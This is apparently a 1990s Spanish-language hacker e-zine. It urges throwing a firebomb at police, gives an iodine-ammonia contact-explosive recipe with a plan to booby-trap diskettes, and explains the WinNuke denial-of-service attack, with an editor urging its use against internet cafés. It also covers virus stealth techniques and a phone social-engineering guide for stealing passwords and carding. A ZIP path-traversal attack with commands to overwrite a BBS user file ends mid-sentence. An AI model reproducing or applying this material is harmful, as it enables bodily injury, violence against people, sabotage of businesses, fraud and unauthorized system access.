        Prendele fuego al trapo y con todas tus ganas proyecta esa botella
        a tu cuerpo policiaco favorito (preferentemente militares).


  Explosivo de Contacto
  ~~~~~~~~~~~~~~~~~~~~~

         Materiales (disponibles en cualquier botica)
         ============================================

             - Cristales de yodo solido (deben ser cristales solidos!)
             - Frasco de vidrio
             - Amoniaco Puro
             - Papel filtro (1 pieza)

         Preparacion:
         ============

             1. Coloca el yodo en el frasco.
             2. Introduce suficiente amoniaco como para cubrir el yodo.
             3. Deja reposar de una hora y media.
             4. Filtra la solucion con el papel filtro.
             5. Los cristales que quedaran en el filtro son EXPLOSIVOS!
             6. Deja secar los cristales.

              [ 8 dias despues Mr.X me envia el siguiente texto ]

 Como se que muchos de ustedes al igual que yo seran lo suficientemente
 curiosos como para intentar crear el explosivo de contacto, quiero contarles
 el accidente que tuve en mi casa mientras seguia mi propia receta. Espero
 aprendan de mi error todos aquellos que les interese hacer este tipo de
 explosivos.

 Ayer fui a una Botica y pedi 1 gramo de cristales de yodo. Me dieron un
 frasco con la etiqueta "yodo metalico" y eran bolas de yodo (casi polvo).
 Consegui el Amoniaco puro ahi mismo y rapidamente fui a la casa para
 probar mi experimento. Mezcle en un recipiente metalico delgado y profundo,
 el gramo de yodo con el suficiente amoniaco para cubrir totalmente el yodo.
 Paso una hora y el yodo parecia hacerse una roca color metal. En hora y
 media coloque el papel filtro que compre tambien en la botica en la boca
 de un frasco y filtre el amoniaco. La mayoria del yodo lo tuve que sacar
 ayudado de un lapiz y lo puse sobre el filtro a secarse. Lo curioso fue que
 algunas gotas de yodo cayeron sobre la alfombra y cuando pasaba por ahi
 caminando hacian una pequeisima explosion. Eso me emociono lo suficiente
 como para dormir pensando que al dia siguiente tendria sobre el filtro el
 tan deseado explosivo de contacto.

 Al dia siguiente me levante y el papel filtro estaba totalmente seco, el
 yodo se habia vuelto gris y era muy parecido a la polvora. En un delirio
 de estupidez se me ocurrio agarrar un poco de ese polvo, ponerlo sobre la
 mesa y usando cualquier cosa aplastarlo para divertirme viendo las chispas.
 Cuando iba metiendo la punta de un lapiz al centro del papel filtro donde
 habia quedado todo el yodo BUUUUMMMMM!!!! Todo el papel filtro se hizo
 pedazos !EN MIS MANOS! Hay GUEY me dolio la mano hasta el &$@!&$@! Mis oidos
 se quedaron en un zumbido por media hora y mi dedo meique aun sigue
 sufriendo cuando trato de hacer cualquier cosa con el. AFORTUNADAMENTE solo
 era un gramo de yodo lo que exploto en mis manos :)

 Experiencia: Lo que aprendi fue simple, una vez seco el yodo NO SE TE OCURRA
 NI SIQUIERA TOCARLO! Es SSUUUPPPPEEEERRR sensible al movimiento. la idea
 que esto me dio es hacer unos 3 gramos de "yodo metalico" (cada uno en
 recipientes separados en caso de accidente) y cuando aun esten humedos por
 el amoniaco untarlos en la parte interna de un diskette y hacer lo descrito
 en mi ultimo articulo "Attack of the killer WareZ". Ah, otra cosa que me
 gustaria decir: El amoniaco es un liquido MUY VENENOSO! No abras el
 recipiente con el amoniaco en un cuarto sin ventilacion y tampoco se te
 ocurra inhalarlo. El yodo aun humedo NO ES EXPLOSIVO asi que en ese momento
 puedes meterlo en pequeas bolsas de tela, periodico etc.

 Precios del Material:
                        Yodo: 16 pesos el gramo
                    Amoniaco:  8 pesos el recipiente
                Papel Filtro:  2.50 la hoja

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 
                          Los Bugientos de Microsoft
                          ~~~~~~~~~~~~~~~~~~~~~~~~~~

    El ultimo bug reportado sobre Microsoft Internet Explorer (el ultimo en
esta hora, de seguro en una hora mas sale otro bug :=)) afecta a los usuarios
de MSIE 3.x y 4.x que tengan PowerPoint en sus computadoras, que como saben
viene con el MSOffice.

    Este "error" permite que un Website malefico (huy que mello) ejecute
CUALQUIER programa en la computadora del usuario sin permiso, incluyendo
aquellos comando para borar archivos y transferir informacion privada (Dios
me perdone).

    Esto se deba a la "integracion" de MSIE y PowerPoint. Existen como 60
millones de usuarios de Office, segun Gillermin Portones (el de lentes).

    Esto quiere decir que los muchachitos de Microsoft no hacen su tarea o no
aprenden o no se que ondas... Pero pensaria uno que harian una revision de
toda la seguridad de su navegador...

    Lo que permite este "feature", llamado action settings, que es utilizado
para crear presentaciones, es poder correr archivos ejecutables.MSIE permite
acceso externo a este "feature" de PowerPoint

    Se espera un parche en microsoft.com.

    Dicen las malas lengua que si juntaramos en un solo lugar todos los
patches de MSIE, se saturaria tanto el espacio, que Internet se colapsaria
como en unos 3 segundos.  Eso dicen....

                    @#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
                                @ DUVAHAZARD @
                           Fluj0 D3 3n3R614 D161+4L
                    @#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@

 Este... pues... a peticion del publico.. UNO MAS de Microsoft! (siempre si
 fueron como 3 segundos JE!)

    Este bug hasta nombrecito tiene.. se llama Out of Band, que basicamente
lo que hace es sacar a los usuarios de una red ya sea NT, Win95 o hasta DOS!

    Unos Hackers que hacian su trabajo descubrieron OTRO problema en
Microsoft networking que permite un cierto tipo de transmision que se llama
Out of Band, y que puede ser pasada a una maquina Windows, que a su vez
causa un Kaos cuando la recibe, osea CraSh totAl! (que bonito).

    En respuesta, microsoft detuvo el Service Pack 3 de NT y hara un
arreglito...

    Este bug que ha sido un temita bastante bueno en IRC, afecta cualquier
computadora con un sistema operativo de Windows con capacidad para Redes.
Esto quiere decir que maquinas con Windows, Windows NT - y hasta DOS - pueden
caer victimas al problema si estan en una red.

    El programa que causa este problema ha estado flotando por IRC desde hace
algun tiempo, y hay muchas variedades como WinNuke, Muerte, y Sinnerz - sin
mencionar todos-los-faciles-de-hacer-scripts de Perl.

    Debido a que el sofware esta disponible los ataques son amplios.

    Los ataques como los que son creados por el Out of Band Request causan lo
que se le llama un servicio denegado, donde un servidor recibe un friego de
peticiones por archivos - lo cual no aguanta y no puede realizar. El programa
trabaja haciendo una simple coneccion TCP/IP a la direccion IP utilizando el
puerto Microsoft designado, 39.

    Despues de realizar la coneccion, el programa transmite informacion por
la conexion usando una etiqueta llamada MSG_OBJ, que, en efecto, le comunica
a Winsock que mande informacion Out of Band.  La informacion enviada
utilizando Out of Band no necesita ser algo especifico. Por ejemplo, WinNuke,
envia la palabra "Bye!" Una vez que la informacion Out of Band es recivida,
despues, esa maquina Windows detiene la comunicacion en la red completamente
y de ahi la negacion de servicio a los usuarios que tratan de conectarse.

 [ Nota del editor: Los cafes que VENDEN el acceso a internet suelen usar a
 Windows NT como su sistema operativo por su falta de conocimiento para
 usar UNIX o LINUX. Ya saben, si quieren causar KaoZ a uno de estos cafes
 solo tienen que conseguir WinNuke, saber la direccion I.P. de su cafe
 local (por medio de email u otras formas ;-) y ponganlos fuera de negocio.
 WINUKE v4 lo pueden conseguir en nuestra pagina en la seccion de WareZ ]

Sobres...

Portense bien...

@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@

Nosotros controlamos la transmision...
Punto.

@ DUVAHAZARD @
http://www.dynamo.com.mx/DUVAHAZARD/
DuvaHazard@hotmail.com
"FLuj0 D3 3n3r614 D161+4L"

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

                               EL FENOMENO VIRUS
                                   por Orion
                             www.arrakis.es/~orion

Definicion

Un virus lo podemos definir, como un pequeo programa cuyo objetivo es
perjudicar el funcionamiento de una computadora, por medio de las
instrucciones con que fue programado.

Podemos dar otra definicion de virus, aquella que los seala como un
programa de ordenador capaz de replicar su codigo, de forma reiterada, en
el soporte distinto al que ocupa inicialmente.

Tal ha sido la evolucion de dichos virus en los ultimos aos, que su numero
aumenta vertiginosamente dia a dia, y se prevee que en el ao 2000,
podrian haber diez millones de virus en circulacion, y hasta hoy se conocen
cerca de 3000 programas en el mundo con estas caracteristicas.

Propiedades de los virus

Ademas de la caracteristica principal de estos programas, que es su facultad
de duplicacion, existen otros muchos caracteres de los virus, como son los
siguientes:

                - Modifican el codigo ejecutable: Aqui aparece el adjetivo
"contagio". Para que un virus contagie a otros programas ejecutables, debe ser
capaz de alterar la organizacion del codigo del programa que va a infectar.
                - Permanecen en la memoria de nuestro ordenador: Cuando un
usuario, inocente de las consecuencias, ejecuta en su ordenador un programa
con virus, este pasa a acomodarse en la memoria RAM. Esto lo hace para
aduearse de la computadora, y por asi decirlo, tomar el mando.
                - Se ejecutan involuntariamente: Un virus sin ejecutar es
imposible que dae nuestra computadora. En ese momento esta en reposo, en
modo de espera, necesitando de alguien que por equivocacion ejecute el
programa "portador" (porque supongo que nadie ejecuta un virus en su ordenador
intencionadamente).
                - Funcionan igual que cualquier programa: Un virus, al ser un
programa de ordenador, se comporta como tal, a lo cual hay que dar gracias.
Dicho programa necesita de alguien que lo ponga en funcionamiento, si no, es
software inutil.
                - Es nocivo para el ordenador: Pero esto depende del virus
con el que tratemos. Podemos encontrarnos programas que destruyen parcial o
totalmente la informacion, o bien programas que tan solo concluyen en un
mensaje continuo en pantalla, aunque al final muy molesto.
                - Se ocultan al usuario: Claramente, el programador del virus
desea que el usuario no lo advierta durante el maximo tiempo posible, hasta
que aparezca la seal de alarma en nuestro ordenador. Conforme pasa el tiempo,
los virus van desarrollando mas y mejores tecnicas de ocultamiento, pero
tambien se van desarrollando los programas antivirus y de localizacion.

Origenes

En el ao 1949, fue Jonh Von Newman, denominado por muchos como el padre de
la informatica, quien tras una serie de estudios reconocio la posible
existencia de un codigo o programa que pudiera reproducirse continuamente.

En Septiembre de 1984, fue Fred Cohen, quien expuso de forma publica el
termino "virus de ordenador", como aquel software maligno con capacidad de
reproduccion, tal y como definio Von Newman.

Desarrollo del fenomeno virus

En los ultimos aos, el area informatica ha experimentado un vertiginoso
crecimiento, y con esto, los programas que las compaias distribuyen, que
cada vez alcanzan antes el periodo de madurez. Hace algunos aos, los
usuarios comenzaron a grabar los programas, debido al alto precio de los
mismos, lo que llevo a los programadores de virus a encontrar el principal
modo de distribucion. Podemos, por otro lado, enunciar otras fuentes de
desarrollo de los virus  como son las redes, el freeware y shareware, las
BBS, y la aparicion de programas sencillos de creacion de virus.


TIPOLOGIA

Los virus que hasta ahora se han descubierto, se clasifican en base a lo
siguiente:

                - Virus de sector de arranque
                - Virus de tabla de particion
                - Virus de fichero
                - Virus multipartes
                - Otros

Virus de sector de arranque

Se clasifican dentro de este apartado, aquellos virus que son capaces de
variar o reemplazar el sector de arranque de un disco duro, como objetivo
final del contagio.
Dicho programa desplaza la version original del sector de arranque,
llevando a la imposibilidad de sobreescritura en dicho sector alterado.
Tales sectores se le apareceran al usuario como en mal estado o inutiles.

Los virus de este tipo, se almacenan en la memoria RAM del ordenador, y se
ejecutan cada vez que el usuario encienda el ordenador.

Virus de tabla de particion

Este tipo de virus, altera la oportunidad que el sistema operativo DOS nos
da a cada usuario, de dividir el disco duro en partes, llamadas
particiones.

Resulta muy poco comun encontrar un virus de este tipo totalmente, pues
para ello el mecanismo de infeccion de este se realizaria de tabla de
particion de un disco duro, a tabla de particion de otro disco duro. Podria
darse, en sistemas de redes locales, es decir, en sistemas de ordenadores
ampliamente intercomunicados.

Virus de fichero

Los virus de fichero son capaces de modificar los ficheros con diversas
extensiones(exe,bat,etc..). El contagio de un virus de este tipo hace
engordar, por asi decirlo, el programa infectado, pues el virus pasa a
formar parte de el.

Cuando se ejecuta un programa contaminado, el virus toma el control y se
instala, como siempre hemos visto que suele hacer, en la memoria RAM de la
computadora. A partir de este momento, el virus esta completamente
preparado para hacer de residente en un programa, e ir expandiendose poco a
poco a  los demas programas de nuestro ordenador.

Virus multipartes

Cuando los programadores de virus desean incrementar las caracteristicas
expansivas y de contagio de un virus, aparecen en escena los llamados
multipartitas. Estos virus son capaces de infectar cuatro posibles
elementos: tabla de particion del disco duro, sector de arranque de disco
duro, sector de arranque de disquete, y fichero ejecutable. Tambien
llamados multipartes, estos "simpaticos", son capaces de contagiar dos o
mas elementos de los que he nombrado anteriormente.

Otros

Aparte de los cuatro tipos de virus que he descrito hasta ahora, podemos
diferenciar tres programas peligrosos, y como no, perniciosos para nuestro
ordenador. estos son los siguientes:

                - Gusano: Podemos definir de esta manera a aquellos programas
que se desplazan por la memoria de una manera independiente, es decir, sin
tener que acogerse a otros programas como el virus. Cuando dicho gusano
encuentra zonas de memoria desocupadas, las ocupa con el fin de poder
realizar copias sucesivas de si mismo.

En base a estos programas, podemos contar lo sucedido con referencia a la
red. El "gusano de internet", fue un programa escrito por Robert Morris Jr.
con 23 aos, y liberado la noche del 2 de noviembre de 1988. Este programa
era capaz de duplicarse por internet, y asi lo hizo; desafortunadamente, el
gusano se paso de la raya y se multiplico incontrolablemente. En muy poco
tiempo, la mayor parte de internet tuvo que ser cerrada, causando asi uno
de los mayores trastornos informaticos de la historia.

                - Caballo de Troya: La caracteristica esencial de estos
programas es la carencia del factor de autoreplica, ejecutandose su codigo
maligno tan solo cuando se ejecuta el programa que lo porta(caballo de troya).
De esta manera, es un programa creado para ofrecer al usuario una apariencia
inofensiva, pero escondiendo un modulo capaz de destruir informacion. Hace
algunos aos, muchas empresas espaolas, recibieron un disquete con
informacion sobre el Sida, pero que incluia un caballo de troya que destruia
datos.

                - Bomba Logica: Dichos programas se caracterizan por estar
ocultos al usuario, en modo de espera, hasta que llega un plazo determinado,
que es cuando se ejecutan. Hasta entonces, el usuario no notaba absolutamente
nada extrao en su ordenador. El tipico ejemplo de estos programas es el
"Viernes 13", que se ejecuta tal fecha, hasta lo cual, lo unico que hace es
ocupar una pequea porcion de memoria.


TECNICAS DE OCULTAMIENTO

La condicion de permanecer oculto al usuario, durante un cierto periodo de
tiempo, mientras se realiza el mayor numero posible de copias, la llevan a
cabo los virus mediante una serie de tecnicas de ocultamiento, que
denominamos como tecnicas stealth. Cuanto mas precisas y avanzadas sean las
tecnicas que utilice cada virus, mas tiempo permanecera escondido a los
ojos del usuario. Normalmente, dichas tecnicas son programadas mediante dos
procesos diferentes:

                - Intercepcion de interrupciones: Todas las aplicaciones que
se ejecutan bajo DOS, utilizan una serie de interrupciones para comunicarse
con el sistema operativo, y solicitar ciertas acciones necesarias del mismo.
Si por cualquier causa  un virus sustituye cualquier interrupcion, cualquier
solicitud que cualquier programa haga de la misma, puede ser redireccionada
por este, y asi llevar a cabo su funcion.

                - Encriptacion del codigo del virus: Dicha tecnica persigue
que el virus aparezca diferente en cada una de las infecciones que lleve a
cabo. De esta manera, dos infecciones de un virus que utiliza la encriptacion
del codigo, solo seran iguales si utiliza la misma clave de encriptacion. La
unica forma de deteccion comun es identificar el algoritmo de mutacion que ha
realizado el virus.

Las tecnicas mas interesantes de ocultamiento de los virus, son las
tecnicas avanzadas, y por ello van a ser las tratadas a continuacion. Cabe
destacar que los virus tambien pueden no tener tecnicas, o tenerlas basicas
o medias.

Principalmente, las tecnicas avanzadas constan de cuatro posibles acciones,
que son las siguientes:

                - Localizacion de un antivirus: Existen virus residentes en
memoria que analizan los diferentes programas, buscando programas antivirus.
Si localizan alguno de ellos, el virus automaticamente desinfecta los ficheros
infectados, y aparentemente sale de la memoria. De esta manera, el programa
pernicioso ensea al usuario los ficheros tal y como estarian normalmente,
sin su presencia.

                - Intercepcion de arranques en caliente: Las tecnicas
avanzadas de un virus pueden incluso simular un arranque en caliente (llamamos
asi al tipico ctrl-alt-supr), sin abandonar la memoria RAM.

                - Utilizacion de algoritmos de encriptacion: Esta tecnica de
los virus persigue evitar la localizacion de signaturas que realizan los
programas de deteccion de virus, cuando son ejecutados.

                - Grabacion aleatoria de rutinas no significativas: Los
programadores expertos, usan dicha tecnica con las rutinas no significativas
de los virus en su proceso de infeccion.


SINTOMAS DE CONTAGIO

Quiza las personas que hasta aqui han leido pensaran,  pero como localizo
un virus en mi ordenador si las tecnicas de ocultamiento son tan avanzadas ?
A continuacion voy a exponer los sintomas mas caracteristicos de la infeccion
de un virus:

                - Cambios en las caracteristicas de los ficheros ejecutables:
Casi todos los virus de fichero, aumentan el tamao de un fichero ejecutable
cuando lo infectan. Tambien puede pasar, si el virus no ha sido programado
por un experto, que cambien la fecha del fichero a la fecha de infeccion.

                - Aparicion de anomalias en el teclado: Existen algunos virus
que definen ciertas teclas que al ser pulsadas, realizan acciones perniciosas
en el ordenador. Tambien suele ser comun el cambio de la configuracion de las
teclas, por la del pais donde se programo el virus.

                - Aparicion de anomalias en el video: Muchos de los virus
eligen el sistema de video para  notificar al usuario su presencia en el
ordenador. Cualquier desajuste de la pantalla, o de los caracteres de esta
nos puede notificar la presencia de un virus.

                - Se modifican el Autoexec.bat y el Config.sys: En ciertas
ocasiones, los virus modifican dichos ficheros para adaptarlos a su presencia,
al igual que las aplicaciones de software.

                - Reduccion del tamao de la memoria RAM: Un virus, cuando
entra en un ordenador, debe situarse obligatoriamente en la memoria RAM, y
por ello ocupa una porcion de ella. Por tanto, el tamao util operativo de la
memoria se reduce en la misma cuantia que tiene el codigo del virus.

                - Desaparicion de datos: Esto es consecuencia de la accion
destructiva para la que son creados casi todos los virus. Depende de la
maldad del virus si se borran con la orden DEL, o mediante el uso de
caracteres basura, lo que hace imposible su recuperacion.

                - El disco duro aparece con sectores en mal estado: Algunos
virus usan sectores del disco para camuflarse, lo que hace que aparezcan como
daados o inoperativos.

                -  Aparicion de mensajes de error inesperados: Lo mas normal,
es que en ciertos virus, el sistema operativo produzca errores inusuales,
cosa que debe alertar al usuario.

                - Reduccion del espacio disponible del disco: Ya que los
virus se van duplicando de manera continua, es normal pensar que esta accion
se lleve a cabo sobre ficheros del disco, lo que lleva a una disminucion del
espacio disponible por el usuario.

DETECCION DEL CONTAGIO

Como muchos de los sintomas que he puesto anteriormente, pueden venir causados
por defectos de Hardware, y no por un contagio de virus, te expongo a
continuacion un pequeo truco para detectar la presencia de este. A veces nos
creemos que un virus tiene la culpa de todo lo que nos pasa, y en cambio lo
que debemos hacer es cambiarnos el disco duro, o alguna de las tarjetas que
componen nuestro ordenador. El truco que puedes usar, aunque hay muchos, y
que te tendra al corriente de la posible infeccion consiste en prepararle una
trampa al virus, y es el siguiente:

Consiste en usar un pequeo programa ejecutable, que se pondra como trampa
al virus. El tamao de dicho programa debe conocerse en todo momento, y
ejecutandolo veremos si nuestro ordenador esta infectado o no. Para ello
crearemos un fichero trampa con extension .COM de la siguiente manera:

                          COPY CON ORION.COM
               <alt-144> <alt-205> <barra espaciadora> <F6> <intro>

Las frases anteriores crean un pequeo fichero ejecutable llamado ORION, de
mas o menos 3 bytes de tamao. Para ver si tenemos virus en la memoria RAM,
tendremos que ejecutar ORION.COM, y comparar su tamao despues de
ejecutado. En resumen, se debe hacer esto:

                                  ORION.COM
                                  DIR ORION.COM

 [ Si el archivo ejecutable ha cambiado de tamao, seguramente tendremos un
 sistema infectado con algun virus. Pero, esta simple prueba no es 100%
 eficaz para detectar un virus, ya que algunos de estos miden el archivo a
 infectar y en caso de ser menor de, digamos, 100 bytes no lo infecta. ]

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

                     *****     ING3NI3RA SOCIAL    ******
                               ~~~~~~~~~~~~~~~~
                           Original de Carlos Truco

- QUE FREGADOS ES?
  -----------------
Supongo que muchos de ustedes, tendran por lo menos alguna idea de lo que es
la ingeniera social, y lo util que es para el carding o el hacking. En muchos
casos resulta un elemento indispensable, siendo una fuente de informacion
basica para realizar estas actividades. Sin embargo habra mas de uno que a
pesar de, usarlo a diario no conoce algunas tecnicas que le facilitaran esta
labor. Asi pues, que fregados es la ingenieria social? La ingeniera social
es basicamente la manipulacion de otra(s) persona(s) con el fin de obtener
alguna informacion o cosa que dicha persona tiene, y que nos pudiera resultar
util a nosotros.

Ejemplos:
Hacemos ingeniera social cuando le hacemos la barba a nuestro jefe por un
aumento, o nos hacen ingeniera social cuando alguien nos llama por telefono
y sucede algo parecido a esto:

-Lamer  : Bueno?
-Alguien: Con el Sr. Fulanito por favor.
-Lamer  : El habla
-Alguien: Hola (con una voz segura y de secretaria), llamo de la empresa X
          para decirle que ha sido agraciado con un viaje a Acapulco GRATIS!

Notese que usa la palabra GRATIS que junto con NUEVO son las dos palabras del
diccionario que influyen mas en la persona promedio.

-Lamer  : Pero como yo?, (pensando para si, que su suerte ha cambiando porque
          el jamas se habia ganado ni un pinche bolillo!)
-Alguien: Pues si, y me da gusto invitarlo a un coctel a la hora X donde se le
          daran detalles.
-Lamer  : Bien alla estare ahi, gracias...
-Alguien: Hasta luego...

Pues bien esta historia termina con dos noticias para el lamer, una buena y
otra mala, la buena: Que si habia viaje, la mala: tiene que comprar un
departamento en Acapulco de sabe cuantos miles de dolares.... ya ni en pesos.
A pesar de esto el vendedor habia cumplido su objetivo: Utilizando la
ingeniera social llego a contactar a algunos posibles compradores de forma
directa, y no gastando mas que unos cuantos refrescos en el coctel.

Pues bien creo que con esta pequea explicacion habra quedado claro lo que es
la ingenieria social. Sin embargo en lo que resta de este texto espero darte
algunas tecnicas que te pueden servir al estar hackeando o al realizar
carding.

-ANTES DE LLAMAR A NUESTRO OBJETIVO:
 -----------------------------------
La ingeniera social no es un proceso sencillo, y espontaneo, (a menos de que
seas bien chido como orador y tengas la suficiente cabeza como para afrontar
las muy variadas reacciones que puede presentar el que le llamas, sino
pareceras un imbecil y el terminara preguntandote en lugar que tu a el) sino
que requiere una gran cantidad de preparacion antes de ser usada. Dicha
preparacion esta en relacion directa a la informacion que deseemos obtener.
Entre mas informacion mas preparacion. Esa es una regla elemental que debes
saber.

Si quieres lograr tus objetivos deberas recordar esta tecnica.

No importa cuan experimentado estes en la ingeniera social, el periodo previo
a ella es elemental. Si por ejemplo sabes la lista de los usuarios de tu
servidor de internet y quieres saber el password de algun login en particular,
pues solo basta con llamarle, y parecer que sabes. La gente es muy tonta ante
ciertas situaciones. Solo hay que aparentar que sabes. A un lamer le puedes
salir con cualquier cosa estupida, pero siempre, SIEMPRE, hay que hacerle
creer al lamer de nuestro gran conocimento sobre lo que hablamos.

Sin embargo algunas veces a uno le toca mala suerte, y se llega a encontrar
con un imbecil que sepa de lo que estas hablando, las cosas se complican, y
tendras que ser mucho mas cuidadoso en lo que diras. Ahi es donde radica la
esencia de mejor primero planear una llamada. No te puedes poner nervioso,
porque la habras cagado. Si empiezas a parecer un nio ridiculo todo lo que
hiciste y haras no servira de nada.

Asi para prevenir estas eventualidades, lo mejor sera primero planear algun
escrito o tener algun guion a seguir en la llamada. Ahi como se supondra, el
guion debera contener no solamente lo esencial de la llamda, sino incluso una
lista de las distintas preguntas que por tu culpa, posiblemente hara la
persona a la que le llamamos. Por que por tu culpa?. Sencillamente tu culpa
por que siempre deberas evitar que la otra persona pregunte, excepto en casos
en que sea inevitable. Tu deberas preguntar no el otro. Recuerda bien esto y
planea bien tu guion. El guion asi te funcionara como una herramienta
elemental y si te sirve bien, te puede servir para otras circunstancias
similares, como en el caso del carding. En algunos escritos encontraras que
es una ayuda, yo no lo considero asi, sino la base de la ingeniera social en
muchos casos.

Otra cosa que sera necesaria muchas veces es un telefono donde pueda
encontrarte la persona a la que llamas. Muchas veces son desconfiados por
naturaleza, o simplemente siguen los pasos predeterminados en dichos
procedimiento. Esta claro que algunas veces algunos entenderan lo que les
estas diciendo, y no creen que sea seguro decir cosas por telefono (cosa
bastante cierta). Claro esta que lo mas imbecil de tu parte seria darles el
numero de telefono de tu casa. Terminaras metido en grandes pedos, por tu
estupidez. Una opcion evidente es llamar de casa de algun conocido por
ejemplo, aunque claro esta tendras que hacerlo bajo ciertas circunstancias
que no pienso explicar aqui. Si se lo joden a el, pues ese ya es su pedo.
Aunque no se lo vayas a hacer eso por ejemplo a tu vieja. Existen formas de
hacerlo por un telefono publico, las cuales explicare en un numero posterior.
Aun asi existen circunstancias, en las que no importara llamar de nuestra
casa, porque a nadie le importara de donde llamaste. Eso ya depende de cada
caso en particular.

Ya por ultimo te voy a decir dos de los secretos basicos que te ayudaran, y
haran que seas un maestro en esto de la ingeniera social:

1 - Mantener tu presencia y dominacion sobre la persona a la que le quieres
hacer ingeniera social. Como dije antes lo mas importante durante la llamada
sera mantener su status de 31337, por decirlo asi, su status de lider. Tendras
que ingeniartelas para hacer al otro tu empleado, y tendras que ingeniartelas
para que el otro te considere a ti como el jefe. Todas las personas se creeran
todo si parece que sabes de lo que hablas. Asi acuerdate de esto:

Siempre has que la otra persona creas que tu eres el fregon en el tema, que
eres realmente el que sabes. Como dije TU sabes de lo que esta hablando,
ellos no saben de lo que estas hablando.

Siempre has que parezca que sabes lo que estas haciendo, porque si no lo haces
la persona dudara. No puedes titubear ante nada, siempre permanece firme en lo
que dices.

Y como dije antes, has tu las preguntas, que el otro no te las haga a ti.

2- Otra cosa que ayuda muchas veces, es el ambiente que se recrea. Si se
supone que hablas de una oficina debes de hacerle creer eso a la otra persona.
Esta claro que por ejemplo un sonido de maquina de escribir ayuda. O una
pequea grabacion de una oficina que tengas por ahi, ayudaran a crear las
condiciones mas propicias para la sugestion de la otra persona. Si se supone
que trabajas de una oficina no vas a tener el sonido de las caricaturas que
esta viendo tu carnal de 3 aos, o de las palomas que truenan en el
microondas, ni vas a escuchar a un vendedor gritando las porquerias que vende.
Eso sencillamente no va. Sin embargo en algunas condiciones necesitaras por
ejemplo que sea al aire libre. Eso ya te lo dejo a tu imaginacion. Si llamas
de una oficina algunos sonidos propios de la computadora seran validos
tambien. Es creible un beep de la computadora. Tambien seria valido un sonido
de telefono que pudieras haber grabado previamente.

En fin sera importante que consideres las tecnicas que te explicado, antes de
hacer la ingeniera social. Piensa bien lo que diras, y como lo diras. Eso
representa casi todo en la ingeniera social. Una cosa mas: Si puedes practica,
haz tu voz creible, di las cosas de una forma perfecta. Y no se te olvide en
el momento de llamar tu guion. Aunque te lo sepas de memoria, puede que se te
olvide y todo la planeacion se habra ido abajo. Y sera muy dificil que se
te pueda presentar la misma oportunidad, con la misma persona, casi imposible.

- DURANTE LA LLAMADA
  ------------------
Ahora es el momento de la verdad. Aqui tendras que hacerlo todo a la
perfeccion no podras fallar. He aqui los grandes consejos que tendras que
tomar en cuenta cuando llames:

1 - NUNCA te pongas nervioso: Siempre manten la calma, no importando las
condiciones y peligros a que te enfrentes. Esa es la cosa mas importante al
llamar. Si la persona a la que llamaste no te quiso proporcionar la
informacion que querias, nunca te desanimes. Probablemente te equivocaste en
tu guion, y no fue el adecuado. Revisa tus palabras y planea uno mejor.
Recuerda hacer uso de sonidos de fondo deacuerdo al ambiente que quieras
recrear. Si a pesar de esto no te funciona, pues intentalo con otra persona.

2 - Si la otra persona comienza a hacer preguntas, y no las tienes planeadas,
cuelga y llama mas tarde, probablemente tengas otras condiciones y se te
facilite el trabajo.

3 - Sigue estos dos consejos y prepara bien las condiciones antes de llamada:
tu guion a decir, con preguntas posibles, y un ambiente correcto, y estaras
del otro lado.
Si requieres informacion para el carding podras tener ya bien planeadas y
estructuradas tus preguntas despues de varias veces. Sabras quien te dara
informacion y quien no inclusive.

- CONCLUSION
  ----------
En fin con esto termino mi punto de vista acerca de lo que es el carding y
los distintos metodos utilizados para su realizacion. Podria dar una lista
de la infinidad de sus usos y aplicaciones, pero creo que por hoy ya es
suficiente sobre el tema. Asi que mejor las dejo a tu imaginacion. Espero
haberlos iluminado.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

                                Hackeando BBS's
                            =--=--=--=--=--=--=--=
                                  Por: Khelbin
                                 Para: Phrack
                            =--=--=--=--=--=--=--=

 Este hack no describe una falla en la seguridad de una BBS o su software
 sino en el tipo de archivador que este usando. Esta tecnica servira
 unicamente en sistemas usando PKZIP/PKUNZIP como el archivador y que este
 usandos flags especificas.

 Muchas BBS's descomprimen los archivos recien 'subidos' al disco e incluyen
 el flag -d y -o que crea los directorios que existen en el archivo zip y
 sobre-escribe los archivos existentes.

 Tomemos el ejemplo de una BBS usando Renegade con un setup standard:

     C:\RENEGADE\
     C:\RENEGADE\TEMP\
     C:\RENEGADE\DATA\

 Supongamos que el archivo copiado a la BBS es copiado a C:\TEMP donde es
 descomprimido y revisado de virus. C:\RENEGADE\DATA\ es donde el archivo
 USERS.DAT esta guardado conteniendo toda la informacion de los usuarios.

 Lo que estamos a punto de aprender es a crear nuestro propio USERS.DAT en
 esa BBS y ponernos una cuenta con privilegios SYSOP.

 Primero necesitariamos preparar nuestro archivo ZIP de la siguiente forma:

         C:\>md tmp
         C:\>md c:\tmp\ddsdata
         C:\>copy c:\renegade\data\users.dat c:\tmp\ddsdata
         C:\>cd tmp
         C:\TMP>pkzip -pr evil.zip

 A continuacion, usando un editor hexadecimal editamos evil.zip. Debes cambiar
 todas las partes donde aparezca "ddsdata" en evil.zip a "../data" y asegurate
 que uses las diagonal correcta. Ahora cuando copies el archivo evil.zip
 sera descomprimido a "../data/users.dat" y el archivo users.dat tuyo sera
 el que sobre escriba al archivo original siempre y cuando la BBS descomprima
